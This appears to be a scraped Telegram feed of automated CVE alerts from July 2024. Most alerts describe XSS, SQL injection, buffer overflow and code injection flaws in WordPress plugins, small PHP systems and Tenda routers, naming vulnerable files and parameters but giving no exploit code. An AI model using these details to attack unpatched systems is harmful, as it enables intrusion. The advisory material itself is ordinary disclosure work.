🚨 CVE-2024-37120Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Biplob Adhikari Tabs allows Stored XSS.This issue affects Tabs: from n/a through 4.0.6.🎖@cveNotify |
|
| 2024-07-22 10:37:31 |
🚨 CVE-2024-37114Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Takashi Matsuyama My Favorites allows Stored XSS.This issue affects My Favorites: from n/a through 1.4.1.🎖@cveNotify |
|
| 2024-07-22 10:37:30 |
🚨 CVE-2024-37101Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in AF themes WP Post Author allows Stored XSS.This issue affects WP Post Author: from n/a through 3.6.7.🎖@cveNotify |
|
| 2024-07-22 10:37:29 |
🚨 CVE-2024-37100Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mayur Somani, threeroutes media Elegant Themes Icons allows Stored XSS.This issue affects Elegant Themes Icons: from n/a through 1.3.🎖@cveNotify |
|
| 2024-07-22 10:37:26 |
🚨 CVE-2024-35656Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Elementor Elementor Pro allows Reflected XSS.This issue affects Elementor Pro: from n/a through 3.21.2.🎖@cveNotify |
|
| 2024-07-22 10:37:25 |
🚨 CVE-2024-33933Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Brainstorm Force, Nikhil Chavan Elementor – Header, Footer & Blocks Template allows DOM-Based XSS.This issue affects Elementor – Header, Footer & Blocks Template: from n/a through 1.6.35.🎖@cveNotify |
|
| 2024-07-22 10:37:24 |
🚨 CVE-2024-23321For RocketMQ versions 5.2.0 and below, under certain conditions, there is a risk of exposure of sensitive Information to an unauthorized actor even if RocketMQ is enabled with authentication and authorization functions.An attacker, possessing regular user privileges or listed in the IP whitelist, could potentially acquire the administrator's account and password through specific interfaces. Such an action would grant them full control over RocketMQ, provided they have access to the broker IP address list.To mitigate these security threats, it is strongly advised that users upgrade to version 5.3.0 or newer. Additionally, we recommend users to use RocketMQ ACL 2.0 instead of the original RocketMQ ACL when upgrading to version Apache RocketMQ 5.3.0.🎖@cveNotify |
|
| 2024-07-22 09:37:43 |
🚨 CVE-2024-37271Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Michael Nelson Print My Blog allows Stored XSS.This issue affects Print My Blog: from n/a through 3.27.0.🎖@cveNotify |
|
| 2024-07-22 09:37:36 |
🚨 CVE-2024-37264Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Groundhogg Inc. Groundhogg allows Reflected XSS.This issue affects Groundhogg: from n/a through 3.4.2.3.🎖@cveNotify |
|
| 2024-07-22 09:37:35 |
🚨 CVE-2024-37262Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vCita.Com Online Booking & Scheduling Calendar for WordPress by vcita allows Reflected XSS.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n/a through 4.4.2.🎖@cveNotify |
|
| 2024-07-22 09:37:31 |
🚨 CVE-2024-37258Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Social Rocket allows Reflected XSS.This issue affects Social Rocket: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-07-22 09:37:30 |
🚨 CVE-2024-37246Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Jethin Gallery Slideshow allows Stored XSS.This issue affects Gallery Slideshow: from n/a through 1.4.1.🎖@cveNotify |
|
| 2024-07-22 09:37:27 |
🚨 CVE-2024-37245Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Vsourz Digital All In One Redirection allows Reflected XSS.This issue affects All In One Redirection: from n/a through 2.2.0.🎖@cveNotify |
|
| 2024-07-22 09:37:26 |
🚨 CVE-2024-39863Apache Airflow versions before 2.9.3 have a vulnerability that allows an authenticated attacker to inject a malicious link when installing a provider. Users are recommended to upgrade to version 2.9.3, which fixes this issue.🎖@cveNotify |
|
| 2024-07-22 09:37:25 |
🚨 CVE-2024-27316HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.🎖@cveNotify |
|
| 2024-07-22 09:37:24 |
🚨 CVE-2023-51437Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification.Users are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file.Any component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker.2.11 Pulsar users should upgrade to at least 2.11.3.3.0 Pulsar users should upgrade to at least 3.0.2.3.1 Pulsar users should upgrade to at least 3.1.1.Any users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions.For additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .🎖@cveNotify |
|
| 2024-07-22 07:37:25 |
🚨 CVE-2024-37391ProtonVPN before 3.2.10 on Windows mishandles the drive installer path, which should use this: '"' + ExpandConstant('{autopf}\Proton\Drive') + '"' in Setup/setup.iss.🎖@cveNotify |
|
| 2024-07-22 07:37:24 |
🚨 CVE-2024-39236Gradio v4.36.1 was discovered to contain a code injection vulnerability via the component /gradio/component_meta.py. This vulnerability is triggered via a crafted input. NOTE: the supplier disputes this because the report is about a user attacking himself.🎖@cveNotify |
|
| 2024-07-22 06:37:30 |
🚨 CVE-2024-6244The PZ Frontend Manager WordPress plugin before 1.0.6 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks🎖@cveNotify |
|
| 2024-07-22 06:37:26 |
🚨 CVE-2024-5973The MasterStudy LMS WordPress Plugin WordPress plugin before 3.3.24 does not prevent students from creating instructor accounts, which could be used to get access to functionalities they shouldn't have.🎖@cveNotify |
|
| 2024-07-22 06:37:25 |
🚨 CVE-2024-5004The CM Popup Plugin for WordPress WordPress plugin before 1.6.6 does not sanitise and escape some of the campaign settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-22 06:37:24 |
🚨 CVE-2024-41709Backdrop CMS before 1.27.3 and 1.28.x before 1.28.2 does not sufficiently sanitize field labels before they are displayed in certain places. This vulnerability is mitigated by the fact that an attacker must have a role with the "administer fields" permission.🎖@cveNotify |
|
| 2024-07-22 05:37:25 |
🚨 CVE-2024-41703LibreChat through 0.7.4-rc1 has incorrect access control for message updates. (Work on a fixed version release has started in PR 3363.)🎖@cveNotify |
|
| 2024-07-22 05:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-07-22 04:37:25 |
🚨 CVE-2024-6970A vulnerability classified as critical has been found in itsourcecode Tailoring Management System 1.0. Affected is an unknown function of the file /staffcatadd.php. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272124.🎖@cveNotify |
|
| 2024-07-22 04:37:24 |
🚨 CVE-2024-6969A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /ajax/get_patient_history.php. The manipulation of the argument patient_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272123.🎖@cveNotify |
|
| 2024-07-22 03:37:25 |
🚨 CVE-2024-6967A vulnerability was found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. It has been classified as critical. This affects an unknown part of the file /employee_gatepass/admin/?page=employee/manage_employee. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272121 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-22 03:37:24 |
🚨 CVE-2024-6966A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file login.php of the component Login. The manipulation of the argument user/pass leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272120.🎖@cveNotify |
|
| 2024-07-22 02:37:25 |
🚨 CVE-2024-6965A vulnerability has been found in Tenda O3 1.0.0.10 and classified as critical. Affected by this vulnerability is the function fromVirtualSet. The manipulation of the argument ip/localPort/publicPort/app leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272119. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-22 02:37:24 |
🚨 CVE-2024-6964A vulnerability, which was classified as critical, was found in Tenda O3 1.0.0.10. Affected is the function fromDhcpSetSer. The manipulation of the argument dhcpEn/startIP/endIP/preDNS/altDNS/mask/gateway leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272118 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-22 00:37:25 |
🚨 CVE-2024-6963A vulnerability, which was classified as critical, has been found in Tenda O3 1.0.0.10. This issue affects the function formexeCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272117 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-22 00:37:24 |
🚨 CVE-2024-6962A vulnerability classified as critical was found in Tenda O3 1.0.0.10. This vulnerability affects the function formQosSet. The manipulation of the argument remark/ipRange/upSpeed/downSpeed/enable leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272116. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-21 23:37:25 |
🚨 CVE-2024-37447Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in PixelYourSite PixelYourSite – Your smart PIXEL (TAG) Manager allows Stored XSS.This issue affects PixelYourSite – Your smart PIXEL (TAG) Manager: from n/a through 9.6.1.1.🎖@cveNotify |
|
| 2024-07-21 23:37:24 |
🚨 CVE-2024-37446Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kiboko Labs Chained Quiz allows Stored XSS.This issue affects Chained Quiz: from n/a through 1.3.2.8.🎖@cveNotify |
|
| 2024-07-21 22:37:32 |
🚨 CVE-2024-37480Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Apollo13Themes Apollo13 Framework Extensions apollo13-framework-extensions allows Stored XSS.This issue affects Apollo13 Framework Extensions: from n/a through 1.9.3.🎖@cveNotify |
|
| 2024-07-21 22:37:25 |
🚨 CVE-2024-37460Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SuperSaaS SuperSaaS – online appointment scheduling allows Stored XSS.This issue affects SuperSaaS – online appointment scheduling: from n/a through 2.1.9.🎖@cveNotify |
|
| 2024-07-21 22:37:24 |
🚨 CVE-2024-37459Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in PayPlus LTD PayPlus Payment Gateway allows Reflected XSS.This issue affects PayPlus Payment Gateway: from n/a through 6.6.8.🎖@cveNotify |
|
| 2024-07-21 21:37:25 |
🚨 CVE-2024-38785Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Jegstudio Gutenverse allows Stored XSS.This issue affects Gutenverse: from n/a through 1.9.2.🎖@cveNotify |
|
| 2024-07-21 21:37:24 |
🚨 CVE-2024-38784Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Livemesh Livemesh Addons for Beaver Builder allows Stored XSS.This issue affects Livemesh Addons for Beaver Builder: from n/a through 3.6.1.🎖@cveNotify |
|
| 2024-07-21 15:37:26 |
🚨 CVE-2024-6958A vulnerability classified as critical was found in itsourcecode University Management System 1.0. This vulnerability affects unknown code of the file /st_update.php of the component Avatar File Handler. The manipulation of the argument personal_image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272080.🎖@cveNotify |
|
| 2024-07-21 15:37:25 |
🚨 CVE-2024-6957A vulnerability classified as critical has been found in itsourcecode University Management System 1.0. This affects an unknown part of the file functions.php of the component Login. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272079.🎖@cveNotify |
|
| 2024-07-21 15:37:24 |
🚨 CVE-2024-6802A vulnerability, which was classified as critical, was found in SourceCodester Computer Laboratory Management System 1.0. Affected is an unknown function of the file /lms/classes/Master.php?f=save_record. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271704.🎖@cveNotify |
|
| 2024-07-21 14:37:24 |
🚨 CVE-2024-6956A vulnerability was found in itsourcecode University Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view_cgpa.php. The manipulation of the argument VR/VN leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272078 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 13:37:25 |
🚨 CVE-2024-6954A vulnerability was found in SourceCodester Record Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file sort1.php. The manipulation of the argument position leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272077 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 13:37:24 |
🚨 CVE-2024-6807A vulnerability was found in SourceCodester Student Study Center Desk Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /sscdms/classes/Users.php?f=save of the component HTTP POST Request Handler. The manipulation of the argument firstname/middlename/lastname/username leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-271706 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 12:37:25 |
🚨 CVE-2024-6953A vulnerability was found in itsourcecode Tailoring Management System 1.0 and classified as critical. This issue affects some unknown processing of the file sms.php. The manipulation of the argument customer leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272075.🎖@cveNotify |
|
| 2024-07-21 12:37:24 |
🚨 CVE-2024-6952A vulnerability has been found in itsourcecode University Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /view_single_result.php?vr=123321&vn=mirage. The manipulation of the argument seme leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272074 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 11:37:25 |
🚨 CVE-2024-6951A vulnerability, which was classified as critical, was found in SourceCodester Simple Online Book Store System 1.0. This affects an unknown part of the file admin_delete.php. The manipulation of the argument bookisbn leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272073 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 11:37:24 |
🚨 CVE-2024-6950A vulnerability, which was classified as critical, has been found in Prain up to 1.3.0. Affected by this issue is some unknown functionality of the file /?import of the component HTTP POST Request Handler. The manipulation of the argument file leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272072.🎖@cveNotify |
|
| 2024-07-21 10:37:25 |
🚨 CVE-2024-6949A vulnerability classified as problematic was found in Gargaj wuhu up to 3faad49bfcc3895e9ff76a591d05c8941273d120. Affected by this vulnerability is an unknown functionality of the file /pages.php?edit=News. The manipulation leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-272071.🎖@cveNotify |
|
| 2024-07-21 10:37:24 |
🚨 CVE-2024-6948A vulnerability classified as critical has been found in Gargaj wuhu up to 3faad49bfcc3895e9ff76a591d05c8941273d120. Affected is an unknown function of the file /slideeditor.php of the component Slide Editor. The manipulation of the argument newSlideFile leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-272070 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 09:37:25 |
🚨 CVE-2024-6947A vulnerability was found in Flute CMS 0.2.2.4-alpha. It has been rated as critical. This issue affects the function replaceContent of the file app/Core/Support/ContentParser.php of the component Notification Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272069 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 09:37:24 |
🚨 CVE-2024-6946A vulnerability was found in Flute CMS 0.2.2.4-alpha. It has been declared as critical. This vulnerability affects unknown code of the file /admin/pages/list. The manipulation of the argument blocks leads to code injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272068.🎖@cveNotify |
|
| 2024-07-21 08:37:42 |
🚨 CVE-2024-6944A vulnerability was found in ZhongBangKeJi CRMEB up to 5.4.0 and classified as critical. Affected by this issue is the function get_image_base64 of the file PublicController.php. The manipulation of the argument file leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272066 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-21 08:37:41 |
🚨 CVE-2024-38437D-Link - CWE-288:Authentication Bypass Using an Alternate Path or Channel🎖@cveNotify |
|
| 2024-07-21 08:37:40 |
🚨 CVE-2024-38436Commugen SOX 365 – CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')🎖@cveNotify |
|
| 2024-07-21 08:37:37 |
🚨 CVE-2024-38435Unitronics Vision PLC – CWE-703: Improper Check or Handling of Exceptional Conditions may allow denial of service🎖@cveNotify |
|
| 2024-07-21 08:37:36 |
🚨 CVE-2024-37519Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Leap13 Premium Blocks – Gutenberg Blocks for WordPress allows Stored XSS.This issue affects Premium Blocks – Gutenberg Blocks for WordPress: from n/a through 2.1.27.🎖@cveNotify |
|
| 2024-07-21 08:37:35 |
🚨 CVE-2024-37515Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Optemiz XPlainer - WooCommerce Product FAQ allows Reflected XSS.This issue affects XPlainer - WooCommerce Product FAQ: from n/a through 1.6.3.🎖@cveNotify |
|
| 2024-07-21 08:37:31 |
🚨 CVE-2024-37512Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Basix NEX-Forms – Ultimate Form Builder allows Stored XSS.This issue affects NEX-Forms – Ultimate Form Builder: from n/a through 8.5.10.🎖@cveNotify |
|
| 2024-07-21 08:37:30 |
🚨 CVE-2024-37507Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Themewinter Eventin allows Stored XSS.This issue affects Eventin: from n/a through 3.3.57.🎖@cveNotify |
|
| 2024-07-21 08:37:29 |
🚨 CVE-2024-37500Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Beaver Builder Team Beaver Builder allows Stored XSS.This issue affects Beaver Builder: from n/a through 2.8.2.2.🎖@cveNotify |
|
| 2024-07-21 08:37:26 |
🚨 CVE-2024-37495Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mediavine Create by Mediavine allows Stored XSS.This issue affects Create by Mediavine: from n/a through 1.9.7.🎖@cveNotify |
|
| 2024-07-21 08:37:25 |
🚨 CVE-2024-37488Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in HelloAsso allows Stored XSS.This issue affects HelloAsso: from n/a through 1.1.9.🎖@cveNotify |
|
| 2024-07-21 08:37:24 |
🚨 CVE-2024-37487Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in wpdirectorykit.Com WP Directory Kit allows Reflected XSS.This issue affects WP Directory Kit: from n/a through 1.3.5.🎖@cveNotify |
|
| 2024-07-21 07:37:41 |
🚨 CVE-2024-6943A vulnerability has been found in ZhongBangKeJi CRMEB up to 5.4.0 and classified as critical. Affected by this vulnerability is the function downloadImage of the file app/services/product/product/CopyTaobaoServices.php. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272065 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-21 07:37:40 |
🚨 CVE-2024-6942A vulnerability, which was classified as problematic, was found in ThinkSAAS 3.7.0. Affected is an unknown function of the file app/system/action/anti.php of the component Admin Panel Security Center. The manipulation of the argument ip/email/phone leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272064.🎖@cveNotify |
|
| 2024-07-21 07:37:37 |
🚨 CVE-2024-38434Unitronics Vision PLC – CWE-676: Use of Potentially Dangerous Function may allow security feature bypass🎖@cveNotify |
|
| 2024-07-21 07:37:36 |
🚨 CVE-2024-37558Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Nazmul Hossain Nihal WPFavicon allows Stored XSS.This issue affects WPFavicon: from n/a through 2.1.1.🎖@cveNotify |
|
| 2024-07-21 07:37:35 |
🚨 CVE-2024-37556Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SeedProd WordPress Notification Bar allows Stored XSS.This issue affects WordPress Notification Bar: from n/a through 1.3.10.🎖@cveNotify |
|
| 2024-07-21 07:37:31 |
🚨 CVE-2024-37551Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Perials Simple Social Share allows Stored XSS.This issue affects Simple Social Share: from n/a through 3.0.🎖@cveNotify |
|
| 2024-07-21 07:37:30 |
🚨 CVE-2024-37548Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Meks Meks Easy Ads Widget allows Stored XSS.This issue affects Meks Easy Ads Widget: from n/a through 2.0.8.🎖@cveNotify |
|
| 2024-07-21 07:37:26 |
🚨 CVE-2024-37538Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Thomas Kuhlmann Link To Bible allows Stored XSS.This issue affects Link To Bible: from n/a through 2.5.9.🎖@cveNotify |
|
| 2024-07-21 07:37:25 |
🚨 CVE-2024-37536Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Web357 Easy Custom Code (LESS/CSS/JS) – Live editing allows Stored XSS.This issue affects Easy Custom Code (LESS/CSS/JS) – Live editing: from n/a through 1.0.8.🎖@cveNotify |
|
| 2024-07-21 07:37:24 |
🚨 CVE-2024-37523Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in AMP-MODE Login Logo Editor allows Stored XSS.This issue affects Login Logo Editor: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-07-21 06:37:26 |
🚨 CVE-2024-6940A vulnerability was found in DedeCMS 5.7.114. It has been classified as critical. This affects an unknown part of the file article_template_rand.php. The manipulation leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271995. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-21 06:37:25 |
🚨 CVE-2024-6731A vulnerability classified as critical has been found in SourceCodester Student Study Center Desk Management System 1.0. This affects an unknown part of the file /Master.php?f=save_student. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271449 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 06:37:24 |
🚨 CVE-2024-6729A vulnerability was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /control/add_act.php. The manipulation of the argument aname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271402 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 05:37:25 |
🚨 CVE-2024-6939A vulnerability was found in Xinhu RockOA 2.6.3 and classified as problematic. Affected by this issue is the function okla of the file /webmain/public/upload/tpl_upload.html. The manipulation of the argument callback leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-271994 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 05:37:24 |
🚨 CVE-2024-6938A vulnerability has been found in SiYuan 3.1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file PDF.js of the component PDF Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271993 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-21 04:37:25 |
🚨 CVE-2024-6937A vulnerability, which was classified as problematic, was found in formtools.org Form Tools 3.1.1. Affected is the function curl_exec of the file /admin/forms/option_lists/edit.php of the component Import Option List. The manipulation of the argument url leads to file inclusion. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-21 04:37:24 |
🚨 CVE-2024-6936A vulnerability, which was classified as problematic, has been found in formtools.org Form Tools 3.1.1. This issue affects some unknown processing of the file /admin/settings/index.php?page=accounts of the component Setting Handler. The manipulation of the argument Page Theme leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271991. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-21 03:37:24 |
🚨 CVE-2024-6935A vulnerability classified as problematic was found in formtools.org Form Tools 3.1.1. This vulnerability affects unknown code of the file /admin/clients/ of the component User Settings Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-21 02:37:24 |
🚨 CVE-2024-6934A vulnerability classified as problematic has been found in formtools.org Form Tools 3.1.1. This affects an unknown part of the file /admin/forms/add/step2.php?submission_type=direct. The manipulation of the argument Form URL leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271989 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-21 01:37:24 |
🚨 CVE-2024-6933A vulnerability was found in LimeSurvey 6.5.14-240624. It has been rated as critical. Affected by this issue is the function actionUpdateSurveyLocaleSettingsGeneralSettings of the file /index.php?r=admin/database/index/updatesurveylocalesettings_generalsettings of the component Survey General Settings Handler. The manipulation of the argument language leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271988. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-20 22:37:24 |
🚨 CVE-2024-6932A vulnerability was found in ClassCMS 4.5. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/?action=home&do=shop:index&keyword=&kind=all. The manipulation of the argument order leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271987.🎖@cveNotify |
|
| 2024-07-20 17:29:52 |
https://t.me/malwr |
|
| 2024-07-20 12:37:24 |
🚨 CVE-2024-6848The Post and Page Builder by BoldGrid – Visual Drag and Drop Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 1.26.6 due to insufficient input sanitization and output escaping affecting the boldgrid_canvas_image AJAX endpoint. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-07-20 10:37:25 |
🚨 CVE-2024-37562Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in BracketSpace Simple Post Notes allows Stored XSS.This issue affects Simple Post Notes: from n/a through 1.7.7.🎖@cveNotify |
|
| 2024-07-20 10:37:24 |
🚨 CVE-2024-37561Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Jamie Bergen Plugin Notes Plus allows Stored XSS.This issue affects Plugin Notes Plus: from n/a through 1.2.6.🎖@cveNotify |
|
| 2024-07-20 09:37:42 |
🚨 CVE-2024-37956Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Vektor,Inc. VK All in One Expansion Unit allows Stored XSS.This issue affects VK All in One Expansion Unit: from n/a through 9.98.1.0.🎖@cveNotify |
|
| 2024-07-20 09:37:41 |
🚨 CVE-2024-37954Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in marcelotorres Simple Responsive Slider allows Reflected XSS.This issue affects Simple Responsive Slider: from n/a through 0.2.2.5.🎖@cveNotify |
|
